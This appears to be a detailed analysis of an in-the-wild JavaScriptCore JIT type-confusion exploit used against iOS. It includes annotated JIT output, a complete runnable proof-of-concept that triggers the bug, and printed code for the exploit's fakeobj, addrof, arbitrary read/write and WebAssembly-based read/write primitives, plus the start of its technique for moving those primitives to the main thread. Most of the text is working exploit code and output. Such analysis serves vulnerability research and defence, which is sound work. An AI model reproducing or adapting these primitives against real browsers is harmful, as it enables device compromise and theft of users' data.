                                                ; v-- bounds check
Air     Patch &Branch32(3,SameAsRep)3, BelowOrEqual, %tmp34, $1, %tmp25
Air     MoveDouble 8(%tmp24), %ftmp1            ; raw double load from butterfly[1]
Air BB#8: ; frequency = 1.000000
Air   Predecessors: #6, #7
Air     Move 8(%x2), %x0                        ; load obj butterfly
Air     Move -16(%x0), %x1                      ; load p1 from butterfly
Air     Patch &Patchpoint0, $0x1034f4150        ; ???
Air     Move $0xfffe000000000002, %x0           ; get expected cell tag 
Air     Patch &BranchTest64(3,SameAsRep)1, NonZero, %x1, %x0, %x1, %x1 ; bail on bad cell tag
Air     Move 8(%x1), %x0                        ; get typeConfused butterfly
Air     Move32 -8(%x0), %x2                     ; load publicLength from butterfly
Air     Patch &Branch32(3,SameAsRep)3, BelowOrEqual, %x2, $1, %x1 ; bounds check
Air     MoveDouble 8(%x0), %q0                  ; typeConfused[1] load as double
Air     Patch &BranchDouble(3,SameAsRep)4, DoubleNotEqualOrUnordered, %q0, %q0, %x1 ; ???
Air     Move $0x780e0000b0, %x2                 ; f64Arr backend
Air     MoveDouble %q0, (%x2)                   ; store typeConfused[1] into f64Arr[0]
Air     Patch &Patchpoint0, $0x10206e488        ; ???
Air     Patch &Patchpoint0, $0x10206e3c8        ; ???
Air     Move32 (%x2), %x4                       ; load i32Arr[0] as int
Air     Move $65536, %x3                        ; increment for pointer shift
Air     AddLeftShift64 %x3, %x4, $12, %x3
Air     Rshift64 %x3, $12, %x3
Air     Move32 %x3, (%x2)                       ; store back incremented pointer into i32Arr[0]
Air     Patch &Patchpoint0, $0x10206e3c8        ; ???
Air     MoveDouble (%x2), %q0                   ; load incremented pointer as double
Air     Patch &Patchpoint0, $0x10206e488        ; ???
Air     Patch &BranchDouble(3,SameAsRep)4, DoubleNotEqualOrUnordered, %q0, %q0, %q0, %x1, %q0 ; ???
Air     MoveDouble %q0, 8(%x0)                  ; store incremented pointer back into typeConfused[1]
Air     Move $10, %x0
Air     Ret64 %x0

Another thing that helped me was looking at the structure IDs of all of the variables. For this we can download a vulnerable version of JSC and then use describe to print struct IDs:

After creation
Object: 0x1064f4150 with butterfly 0x0(base=0xfffffffffffffff8) (Structure 0x30000a780:[0xa780/42880, Object, (0/0, 0/0){}, NonArray, Proto:0x106444180, Leaf]), StructureID: 42880
Object: 0x1064f4160 with butterfly 0x0(base=0xfffffffffffffff8) (Structure 0x30000a780:[0xa780/42880, Object, (0/0, 0/0){}, NonArray, Proto:0x106444180, Leaf]), StructureID: 42880
After p1/p2 assign
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000a860:[0xa860/43104, Object, (0/0, 2/4){p1:64, p2:65}, NonArray, Proto:0x106444180, Leaf]), StructureID: 43104
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000a860:[0xa860/43104, Object, (0/0, 2/4){p1:64, p2:65}, NonArray, Proto:0x106444180, Leaf]), StructureID: 43104
After structS3.p2 delete
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000a860:[0xa860/43104, Object, (0/0, 2/4){p2:65, p1:64}, NonArray, Proto:0x106444180]), StructureID: 43104
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000a8d0:[0xa8d0/43216, Object, (0/0, 2/4){p1:64}, NonArray, Proto:0x106444180, Leaf]), StructureID: 43216
After structS3.p1 delete
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000a860:[0xa860/43104, Object, (0/0, 2/4){p2:65, p1:64}, NonArray, Proto:0x106444180]), StructureID: 43104
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000a940:[0xa940/43328, Object, (0/0, 2/4){}, NonArray, Proto:0x106444180, Leaf]), StructureID: 43328
After structS3.p1 assign
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000a860:[0xa860/43104, Object, (0/0, 2/4){p2:65, p1:64}, NonArray, Proto:0x106444180]), StructureID: 43104
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000a9b0:[0xa9b0/43440, Object, (0/0, 2/4){p1:64}, NonArray, Proto:0x106444180, Leaf]), StructureID: 43440
After structS3.p2 assign
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000a860:[0xa860/43104, Object, (0/0, 2/4){p2:65, p1:64}, NonArray, Proto:0x106444180]), StructureID: 43104
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000aa20:[0xaa20/43552, Object, (0/0, 2/4){p1:64, p2:65}, NonArray, Proto:0x106444180, Leaf]), StructureID: 43552
After structS1.p2 delete
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000a8d0:[0xa8d0/43216, Object, (0/0, 2/4){p1:64}, NonArray, Proto:0x106444180]), StructureID: 43216
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000aa20:[0xaa20/43552, Object, (0/0, 2/4){p1:64, p2:65}, NonArray, Proto:0x106444180, Leaf (Watched)]), StructureID: 43552
After structS1.p1 delete
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000a940:[0xa940/43328, Object, (0/0, 2/4){}, NonArray, Proto:0x106444180]), StructureID: 43328
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000aa20:[0xaa20/43552, Object, (0/0, 2/4){p2:65, p1:64}, NonArray, Proto:0x106444180, Leaf (Watched)]), StructureID: 43552
After structS1.p1 assign
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000a9b0:[0xa9b0/43440, Object, (0/0, 2/4){p1:64}, NonArray, Proto:0x106444180]), StructureID: 43440
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000aa20:[0xaa20/43552, Object, (0/0, 2/4){p2:65, p1:64}, NonArray, Proto:0x106444180, Leaf (Watched)]), StructureID: 43552
After structS1.p2 assign
Object: 0x1064f4150 with butterfly 0x70630026c8(base=0x70630026a0) (Structure 0x30000aa20:[0xaa20/43552, Object, (0/0, 2/4){p2:65, p1:64}, NonArray, Proto:0x106444180, Leaf (Watched)]), StructureID: 43552
Object: 0x1064f4160 with butterfly 0x70630026e8(base=0x70630026c0) (Structure 0x30000aa20:[0xaa20/43552, Object, (0/0, 2/4){p2:65, p1:64}, NonArray, Proto:0x106444180, Leaf (Watched)]), StructureID: 43552

if you want to you can play around with the PoC yourself (click to expand)

let victimObj = {prop1: 1, prop2: 2}; // the exploit will in the end end up with a corrupted pointer on this object so that instead of pointing to the object header it points to prop1&prop2 allowing us to forge an obj
let fakeFloatArr = [1.1, victimObj];

let floatArrWProp1 = [1.1, 1.1];
floatArrWProp1.prop = 1.1;
let floatArrWProp2 = [1.1, 2.2];
floatArrWProp2.prop = 1.1;

function newTarget() {}
let structS1 = Reflect.construct(Object, [], newTarget);
let structS3 = Reflect.construct(Object, [], newTarget);
//print("After creation"); print(describe(structS1)); print(describe(structS3));
// 42880/42880
structS1.p1 = floatArrWProp1;
structS1.p2 = floatArrWProp1;
structS3.p1 = 0x1337;
structS3.p2 = 0x1337;
//print("After p1/p2 assign"); print(describe(structS1)); print(describe(structS3));
// 43104/43104
delete structS3.p2;
// print("After structS3.p2 delete"); print(describe(structS1)); print(describe(structS3));
// 43104/43216
delete structS3.p1;
// print("After structS3.p1 delete"); print(describe(structS1)); print(describe(structS3));
// 43104/43328
structS3.p1 = 0x1337;
// print("After structS3.p1 assign"); print(describe(structS1)); print(describe(structS3));
// 43104/43440
structS3.p2 = 0x1337;
// print("After structS3.p2 assign"); print(describe(structS1)); print(describe(structS3));
// 43104/43552

let compilerSlowDownObj = {}; // {guard_p1: 1}; // {guard_p1: 1,p1: [1.1, 2.2]};

// arrays to do the confusion with
let i32Arr = new Uint32Array(2);
let f64Arr = new Float64Array(i32Arr.buffer);

function toJIT(useS3, skipEverything) {
    // this is there so that the JIT will never see obj becoming struct type 2 (which could happen after the delete)
    if (skipEverything) {return;}

    let obj = structS1;
    if (useS3) {
        obj = structS3;
        // JIT barrier - this can have side effects so the JIT has to forget type of obj
        (0)[0]
    }

    // slow down compiler
    let slowdownLoopCnt = 0;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;

    // real exploit does this - I assumed to force a type check here instead of doing it later - but I can remove it and still crash
    /*"uo" in obj;*/
    let typeConfused = obj.p1; // JIT compiler assumes typeConfused to be an array of two floats
    if (useS3) typeConfused = floatArrWProp2;
    f64Arr[0] = typeConfused[1]; // because of the assumption above this is a simple store
    i32Arr[0] = i32Arr[0] + 16;
    typeConfused[1] = f64Arr[0]; // and this is a simple store as well
    
    // slow down compiler again 
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;
    while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--; while (slowdownLoopCnt < 1) {compilerSlowDownObj.guard_p1=1;slowdownLoopCnt++;}slowdownLoopCnt--;

}

// now they need to JIT this function
const jitIterTotal = 0x1000000;
const jitIterTrain = 0x20000;
for (let jitIterCnt = 0; jitIterCnt < jitIterTotal; jitIterCnt++) {
    if (jitIterCnt > jitIterTrain) {
        // forcing compilation
        toJIT(false,true);
    }else{
        // training
        toJIT(jitIterCnt % 2 && jitIterCnt < 256, jitIterCnt > 4096);
    }
    if (jitIterCnt == jitIterTrain) {
        delete structS1.p2;
        // print("After structS1.p2 delete"); print(describe(structS1)); print(describe(structS3));
        // 43216 / 43552
    }
}

// now the function is hopefully compiled wrong
for (let t = 0; t < 0x100000; t++) new Array(13.37, 13.37, 13.37, 13.37); // force GC (assumed because calling gc() will also work)
delete structS1.p1; // strip of signature fully?
//print("After structS1.p1 delete"); print(describe(structS1)); print(describe(structS3));
// 43328 / 43552
structS1.p1 = fakeFloatArr;
// print("After structS1.p1 assign"); print(describe(structS1)); print(describe(structS3));
// 43440 / 43552
structS1.p2 = 1;
// print("After structS1.p2 assign"); print(describe(structS1)); print(describe(structS3));
// 43552 / 43552
// at this point structS1 is structS3 again so we are fine with calling the function and not drop into the slow path
toJIT(false,false); // this will if everything went ok corrupt fakeFloatArr[1] to point to victimObj+0x10 instead of victimObj

// now force a crash
let converter32 = new Uint32Array(2);
let converterFloat = new Float64Array(converter32.buffer);
let i32objtofloat = function (t) {converter32[0] = t[0]; converter32[1] = t[1] - 0x20000; return converterFloat[0]}
victimObj.prop1 = i32objtofloat([201527, 16783110]); // valid JS obj header?
JSON.stringify(structS1) // just trigger the crash

and invoke via:

DYLD_FRAMEWORK_PATH=./272535@main/Release/ ./272535@main/Release/jsc poc.js

3.2.4. Integration in the cassowary module

The cassowary module contains two functions, an exported one that is used to do a single exploitation attempt and the main one that contains the actual exploit and all the relevant code for it. This bigger function contains:

relevant offsets
a function to change the offsets based on the iOS version
helper functions
a big function that contains the actual exploit
a function to run the exploit in a background worker thread
a class for R/W
a class to deal with 64-bit numbers
main code which will detect if it's running on a worker and if not create one and then run the exploit within it

The reason for the worker thread is likely to provide a clean execution environment for the exploit, making it more deterministic and allowing for easy retries by restarting the worker. After obtaining the R/W primitive in the worker, it is then transferred to the main thread by corrupting its stack (more details later), which is very slick and also doesn't add much complexity to the design, so I think their decision to use a worker thread is a solid one.

The inner exploit function contains helpers and five main functions which:

trigger the bug and get a misaligned pointer (described in the previous section)
use that to gain early R/W
escalate the early to stable R/W
test the R/W primitive
cleanup
export of the R/W primitive to the main thread

3.2.5. Gaining early R/W from the misaligned pointer

The misaligned pointer they get from the type confusion is now pointing to prop1 and prop2 of the victimObj, accessing it means the engine interprets prop1 as a fake JSCell header and prop2 as the butterfly pointer of the object. This is basically a classical fakeobj primitive.

From this the exploit will create an addrof primitive by creating a fake float array object (via a fake JSCell header in prop1) which has a butterfly pointer to yet another JS object (by setting prop2 to targetObj). Then any access to the elements of the fake float array will follow the butterfly pointer to the targetObj and allow the exploit to read/write on it. For addrof the attacker simply places an object into one of the inline properties of targetObj then reads from that index in the fake float array to get the address of the object.

In practice things aren't this easy because the engine might perform checks and then reject the fake float array, because of this the exploit actually builds the addrof primitive around this function they JIT to avoid these checks, which also has the secondary purpose of giving a relative OOB write primitive:

function jittedWriter(t, n) {
    let r = exploit_module.gRWArray1[0];
    f64_arrbuf7[0] = r[2];
    f64_arrbuf7[1] = r[4];
    f64_arrbuf7[2] = r[5];
    f64_arrbuf7[3] = r[0];
    f64_arrbuf7[4] = r[1];
    r = exploit_module.gRWArray1[2];
    r[t] = n
}

They copy 5 floats from exploit_module.gRWArray1[0] into another global array and then write a float to an arbitrary index of exploit_module.gRWArray1[2].

I assume the reason for using these indices is to keep the JIT from loading both gRWArray1[0] and gRWArray1[2] at the same time or optimising the 5 loads into a vector load.

They JIT this function while both index 0 and 2 are a training object:

let training_obj_mbe = {p1: 1, p2: 1, length: 16};
Array.prototype.fill.call(training_obj_mbe, 1.1);
[...]
exploit_module.gRWArray1[0] = training_obj_mbe;
exploit_module.gRWArray1[2] = training_obj_mbe;
for (let t = 0; t < 0x100000; t++) jittedWriter(1, 1.1);

Then they create this addrof function:

m.addrof = function(n) { // po
    targetObj.b1 = n; // set object in butterfly
    exploit_module.gRWArray1[2] = training_obj_mbe; // avoid sideeffects of obj 2 (the function is dual purpose)
    jittedWriter(1, 1.1); // trigger
    return f64_to_num(f64_arrbuf7[0]) // now they can read the float from the array and then convert it back to a number
};

This function operates on a specifically corrupted exploit_module.gRWArray1[0] which is set up before:

exploit_module.gRWArray1[0] = exploit_module.type_confused_float_arr[1];
exploit_module.type_confused_float_arr[1] = null;

Where type_confused_float_arr[1] is the by +0x10 shifted pointer from the previous stage, which points to the properties of the object allowing them to forge an arbitrary JS Cell header.

The setup for the object we have a misaligned pointer to is the following:

var fakeHdr = exploit_module.hdr2float([0x31337, 0x1001706]); // m_indexingTypeAndMisc: 6 (NonArrayWithDouble) m_type: 23 (ObjectType) m_flags: 0, m_cellState: 1 (DefinitelyWhite) 
exploit_module.flaky_obj.lo = fakeHdr;
exploit_module.flaky_obj.co = targetObj;

So to summarise: at this point they have exploit_module.gRWArray1[0] pointing to flaky_obj+0x10 thanks to the previous stage/the bug, there they have a fake JS Cell header with the struct ID 0x31337 and the type flags 0x1001706 which encode a double array followed by a fake butterfly that points to targetObj. Then they have a jitted function that operates on float arrays and its type check will see the fake header's type and pass, then access the butterfly as a float array, which allows them to read the b1 property of targetObj as a float. So by storing an object in that property, then calling the jitted function they can gain an addrof primitive for any JS object.

Sidenote: hdr2float specifically subtracts 0x20000 from the second part of the header, this is because the runtime will set bit 49 to "box" this value - basically mark it as a float and the code has to account for that.

The target object is surrounded by 256 objects below and another 256 objects above it. I think for this step the Eden GC from above is probably important as they need to guarantee that either obj_before_target or obj_after_target is right behind the target object for R/W later.

I don't fully understand the reason to spray another 256 objects after targetObj. I think they would get away with a lot fewer.

exploit_module.tmpOptArr = [];
for (let t = 0; t < 256; t++) exploit_module.tmpOptArr[t] = {a1: 3.14, a2: 1.1};
let targetObj = {b1: exploit_module.ref2};
targetObj[0] = 1.1;
targetObj[1] = 1.1;
targetObj[2] = 1.1;
targetObj[3] = 1.1;
targetObj[4] = 1.1;
for (let t = 256; t < 512; t++) exploit_module.tmpOptArr[t] = {a1: 3.14, a2: 1.1};

// the two around the target seem to be important too
let obj_after_target = exploit_module.tmpOptArr[256]; // l
obj_after_target[0] = 1.1;
obj_after_target[1] = 1.1;
obj_after_target[2] = 1.1;
obj_after_target[3] = 1.1;
obj_after_target[4] = 1.1;
let obj_before_target = exploit_module.tmpOptArr[255]; // c
obj_before_target[0] = 1.1;
obj_before_target[1] = 1.1;
obj_before_target[2] = 1.1;
obj_before_target[3] = 1.1;
obj_before_target[4] = 1.1;

After that they gain R/W based on float64 arrays. This is done by initially getting a legitimate struct ID of an object and setting it on targetObj.

Afterwards they use the addrof primitive to find out which object is behind the targetObj and read the address of a float array as well as the butterfly pointer of the targetObj.

Then they use the relative OOB write primitive to corrupt the butterfly pointer of the adjacent object to targetObj and point it to the float array's butterfly pointer (so that they can overwrite it).

Finally they JIT two functions that overwrite the butterfly pointer of the float array to point to an arbitrary address and then read/write from it and afterwards reset it to the value of targetObj. Again here I'm not sure why they decide to reset the butterfly pointer of the float array to the value of targetObj instead of resetting it to the original value.

3.2.5.1. Detailed look at the R/W functions

(click to expand)

The R/W functions are the following and get jitted in the following way:

function read_jit() {
    let float_arr = rw_pair[0];
    let float_arr_obj = rw_pair[1];
    float_arr[2] = 3.3;
    float_arr_obj[0] = f64_arrbuf7[0]; // addr to read from
    useless[1] = 3.3;
    f64_arrbuf7[0] = float_arr[0]; // value being read
    float_arr_obj[0] = f64_arrbuf7[1]; // reset
    return f64_arrbuf7[0] // return read value
}
for (let t = 0; t < 1048576; t++) {
    useless = new Array(1, 2, 3);
    read_jit(t + 3.3);
    read_jit(t + .1)
}

function write_jit() {
    let float_arr = rw_pair[0];
    let float_arr_obj = rw_pair[1];
    float_arr[2] = 3.3;
    float_arr_obj[0] = f64_arrbuf7[0];
    useless[1] = 3.3;
    float_arr[0] = f64_arrbuf7[2];
    float_arr_obj[0] = f64_arrbuf7[1]
}
for (let t = 0; t < 1048576; t++) {
    useless = new Array(1, 2, 3);
    write_jit(t + 3.3, 13.37);
    write_jit(t + 3.3, 13.37)
}

rw_pair contains the float array that has its butterfly pointer corrupted and the adjacent object, whose butterfly pointer points to that of the array.

I assume the reason for useless as well as the access on float array itself is simply to generate a favourable JIT pattern. Presumably they aren't able to prove that useless is side-effect-free so they need to reload the butterfly pointer in the JIT and then it's reset right away to avoid problems with GC.

Afterwards they upgrade their read primitive, I assume so that they can read all values, not just those that are valid floats. For that they abuse the fact that the length of a butterfly is stored inside of the butterfly itself, so when they modify the butterfly pointer of an array and then access the length property of the array they get a 32-bit read. This is again done with jitted code, I assume to avoid runtime checks. At this point they also upgrade the addrof primitive to use the read instead of the original one, probably again to be able to read all values.

3.2.5.2. Detailed look at the 32-bit read function

(click to expand)

Initially they need to JIT the read function that fetches the length:

let read_abused_arr = new Array(4096).fill(13.37);
function jitted_read_abused_arr_len() {
    return read_abused_arr.length
}
for (let t = 0; t < 0x100000; t++) jitted_read_abused_arr_len(t + .1);

Then they setup the read:

const read_abused_arr_addr = m.addrof(read_abused_arr);
const read_abused_arr_orig_backend_ptr = m.read(read_abused_arr_addr + 8);
m.stage2_read = function(t) { // Ys
    m.write_v1(read_abused_arr_addr + 8, t + 8);
    let i = jitted_read_abused_arr_len();
    m.write_v1(read_abused_arr_addr + 8, read_abused_arr_orig_backend_ptr);
    return i >>> 0
};

and also provide multiple versions of the read and write primitives reading different sizes and types.

Finally they validate their primitives by setting values in an array and then reading them with the read function and then change them with the write and read them back from JS.

At this point I would call R/W done, but they have a R/W class that they want to pass primitives to. This class uses WebAssembly to do the actual read and write, so let's have a look at this next.

3.2.6. WebAssembly R/W class

The wasm R/W class initialises two very simple wasm modules:

(module
(type (;0;) (func (result i64)))
(type (;1;) (func (param i64)))
(func (;0;) (type 0) (result i64)
    global.get 1)
(func (;1;) (type 1) (param i64)
    local.get 0
    global.set 1)
(table (;0;) 1 externref)
(memory (;0;) 1)
(global (;0;) (mut v128) (v128.const i32x4 0x33333333 0x33333333 0x33333333 0x33333333))
(global (;1;) (mut i64) (i64.const -6067004223159161907))
(global (;2;) (mut v128) (v128.const i32x4 0x33333333 0x33333333 0x33333333 0x33333333))
(global (;3;) (mut externref) (ref.null extern))
(global (;4;) (mut externref) (ref.null extern))
(global (;5;) (mut externref) (ref.null extern))
(global (;6;) (mut externref) (ref.null extern))
(global (;7;) (mut externref) (ref.null extern))
(export "edfy" (global 1))
(export "memory" (memory 0))
(export "btl" (func 0))
(export "alt" (func 1)))

They define two functions btl and alt that read and write a wasm i64 global. With the already established primitives, the global value pointer of the first instance can be set to that of the second instance, which they can then use for R/W to any address. Additionally, the exploit clears m_globalsToMark to avoid the GC touching the globals and potentially crashing the process. From then on the addrof primitive works by getting the address of a JS object (with the old addrof), setting an object into its inline properties, and then reading from them.

The R/W module then exports a lot of helpful functions to read and write different sizes and types, as well as wrapping them around the number class to make handling easier.

3.2.7. Moving R/W to the main thread

So far all of this has happened in the worker thread that was created for exploitation. In there the exploit now has full R/W, but the attacker somehow needs to transfer it to the main thread to continue exploitation there. For this the worker signals the main thread, which then invokes the following flow on the main thread:

const marker_array = JSON.parse(("[0.0, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9, 10.10]")); // the reason they do this is to avoid having 5.5 as a number on the stack somewhere ig
const rw = new rw_module; // c
const com_arr_towards_worker = rw.arr_obj_num_num_prop;
marker_array[0] = rw.numConv.bigint_to_f64(0xdeadn);
marker_array[1] = -0;
com_arr_towards_worker[0] = rw.webasm_instance;
com_arr_towards_worker[1] = rw.wasm_instance2;
const take_primitives = () => {
    const arr_to_find = [0x55432, com_arr_towards_worker, 0x55432, 0xFF432, marker_array, 0xFF432];
    const recursive_func = (t, ...e) => {
        try {
            recursive_func(t + 1, ...arr_to_find, ...e)
        } catch (t) {}
